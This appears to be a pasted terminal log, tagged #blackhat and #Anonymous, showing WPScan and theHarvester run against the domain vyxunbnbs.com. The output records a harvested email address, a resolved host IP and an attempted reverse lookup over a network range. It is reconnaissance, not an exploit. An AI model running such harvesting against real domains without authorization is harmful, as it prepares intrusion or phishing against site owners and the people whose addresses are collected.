\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 2.9
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________


[!] The remote website is up, but does not seem to be running WordPress.

COLLECT ALL THE EMAIL WITH THEHARVESTER

┌─[root@parrot]─[~]
└──╼ #theharvester -d vyxunbnbs.com -b all -n -c -t -l 50 -h

*******************************************************************
* *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* TheHarvester Ver. 2.7 *
* Coded by Christian Martorella *
* Edge-Security Research *
* cmartorella@edge-security.com *
*******************************************************************


Full harvest..
[-] Searching in Google..
Searching 0 results...
[-] Searching in PGP Key server..
[-] Searching in Bing..
Searching 50 results...
[-] Searching in Exalead..
Searching 50 results...
Searching 100 results...


[+] Emails found:
------------------
pixel-146454504959172-web-@vyxunbnbs.com

[+] Hosts found in search engines:
------------------------------------
[-] Resolving hostnames IPs...
198.71.232.3:www.vyxunbnbs.com

[+] Starting active queries:
[-]Performing reverse lookup in :198.71.232.0/24
Error in DNS resolvers

DONE

#blackhat #Anonymous #GLOBAL